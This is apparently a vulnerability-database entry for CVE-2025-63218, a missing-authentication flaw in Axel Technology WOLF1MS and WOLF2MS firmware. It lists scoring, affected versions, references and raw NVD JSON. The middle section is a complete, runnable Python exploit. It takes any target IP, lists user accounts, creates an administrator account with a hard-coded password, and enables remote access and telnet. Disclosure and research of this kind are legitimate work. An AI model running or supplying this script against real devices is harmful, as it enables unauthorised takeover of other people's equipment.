Security Vulnerability Report
CVE-2025-63218 CVSS 9.8 CRITICAL

CVE-2025-63218

Published: 2025-11-19 15:15:50
Last Modified: 2026-01-12 16:01:06

Description

The Axel Technology WOLF1MS and WOLF2MS devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:axeltechnology:wolf1ms_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:axeltechnology:wolf1ms:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:axeltechnology:wolf2ms_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:axeltechnology:wolf2ms:-:*:*:*:*:*:*:* - NOT VULNERABLE
Axel Technology WOLF1MS firmware 0.8.5
Axel Technology WOLF1MS firmware 0.8.6
Axel Technology WOLF1MS firmware 0.8.7
Axel Technology WOLF1MS firmware 0.8.8
Axel Technology WOLF1MS firmware 0.8.9
Axel Technology WOLF1MS firmware 0.9.0
Axel Technology WOLF1MS firmware 0.9.1
Axel Technology WOLF1MS firmware 0.9.2
Axel Technology WOLF1MS firmware 0.9.3
Axel Technology WOLF1MS firmware 0.9.4
Axel Technology WOLF1MS firmware 0.9.5
Axel Technology WOLF1MS firmware 0.9.6
Axel Technology WOLF1MS firmware 0.9.7
Axel Technology WOLF1MS firmware 0.9.8
Axel Technology WOLF1MS firmware 0.9.9
Axel Technology WOLF1MS firmware 1.0.0
Axel Technology WOLF1MS firmware 1.0.1
Axel Technology WOLF1MS firmware 1.0.2
Axel Technology WOLF1MS firmware 1.0.3
Axel Technology WOLF2MS firmware 0.8.5
Axel Technology WOLF2MS firmware 0.8.6
Axel Technology WOLF2MS firmware 0.8.7
Axel Technology WOLF2MS firmware 0.8.8
Axel Technology WOLF2MS firmware 0.8.9
Axel Technology WOLF2MS firmware 0.9.0
Axel Technology WOLF2MS firmware 0.9.1
Axel Technology WOLF2MS firmware 0.9.2
Axel Technology WOLF2MS firmware 0.9.3
Axel Technology WOLF2MS firmware 0.9.4
Axel Technology WOLF2MS firmware 0.9.5
Axel Technology WOLF2MS firmware 0.9.6
Axel Technology WOLF2MS firmware 0.9.7
Axel Technology WOLF2MS firmware 0.9.8
Axel Technology WOLF2MS firmware 0.9.9
Axel Technology WOLF2MS firmware 1.0.0
Axel Technology WOLF2MS firmware 1.0.1
Axel Technology WOLF2MS firmware 1.0.2
Axel Technology WOLF2MS firmware 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-63218 PoC - Axel Technology WOLF1MS/WOLF2MS Broken Access Control
# Target: /cgi-bin/gstFcgi.fcgi endpoint
import requests
import sys
import json


def exploit(target_ip, target_port=80):
    base_url = f"http://{target_ip}:{target_port}"
    endpoint = "/cgi-bin/gstFcgi.fcgi"
    print(f"[*] Targeting {base_url}")
    print(f"[*] Exploiting CVE-2025-63218 - Missing Authentication\n")

    # Step 1: List all user accounts (No authentication required)
    print("[+] Step 1: Enumerating user accounts...")
    list_users_payload = {
        "action": "list_users",
        "module": "user_management"
    }
    try:
        response = requests.post(
            f"{base_url}{endpoint}",
            data=list_users_payload,
            timeout=10
        )
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Users List: {response.text}")
    except Exception as e:
        print(f"[-] Error listing users: {e}")

    # Step 2: Create new admin user
    print("\n[+] Step 2: Creating new admin user...")
    create_user_payload = {
        "action": "create_user",
        "module": "user_management",
        "username": "hacker_admin",
        "password": "P@ssw0rd123!",
        "role": "administrator"
    }
    try:
        response = requests.post(
            f"{base_url}{endpoint}",
            data=create_user_payload,
            timeout=10
        )
        print(f"[*] Create User Response: {response.text}")
    except Exception as e:
        print(f"[-] Error creating user: {e}")

    # Step 3: Modify system settings
    print("\n[+] Step 3: Modifying system settings...")
    modify_settings_payload = {
        "action": "modify_settings",
        "module": "system_config",
        "settings": json.dumps({"remote_access": True, "telnet_enabled": True})
    }
    try:
        response = requests.post(
            f"{base_url}{endpoint}",
            data=modify_settings_payload,
            timeout=10
        )
        print(f"[*] Settings Modified: {response.text}")
    except Exception as e:
        print(f"[-] Error modifying settings: {e}")

    print("\n[!] Exploitation complete. Device may be fully compromised.")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit(target, port)
```

References

https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63218_Axel%20Technology%20WOLF1MS%20and%20WOLF2MS%20-%20Broken%20Access%20Control (Exploit, Third Party Advisory)
https://www.axeltechnology.com/ (Product)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-63218", "sourceIdentifier": "[email protected]", "published": "2025-11-19T15:15:50.453", "lastModified": "2026-01-12T16:01:06.177", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Axel Technology WOLF1MS and WOLF2MS devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-285"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:axeltechnology:wolf1ms_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.8.5", "versionEndIncluding": "1.0.3", "matchCriteriaId": "6CD63D4E-079A-4F2F-A4DA-20D1FA44F0DB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:axeltechnology:wolf1ms:-:*:*:*:*:*:*:*", "matchCriteriaId": "80DEC281-BE5E-42AC-875E-E4869D0AE8A0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:axeltechnology:wolf2ms_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.8.5", "versionEndIncluding": "1.0.3", "matchCriteriaId": "8703F9D9-8688-41D3-803C-6991085204BE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:axeltechnology:wolf2ms:-:*:*:*:*:*:*:*", "matchCriteriaId": "B43485C9-4F82-4991-B22A-6C1F2ADD3214"}]}]}], "references": [{"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63218_Axel%20Technology%20WOLF1MS%20and%20WOLF2MS%20-%20Broken%20Access%20Control", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.axeltechnology.com/", "source": "[email protected]", "tags": ["Product"]}]}}
```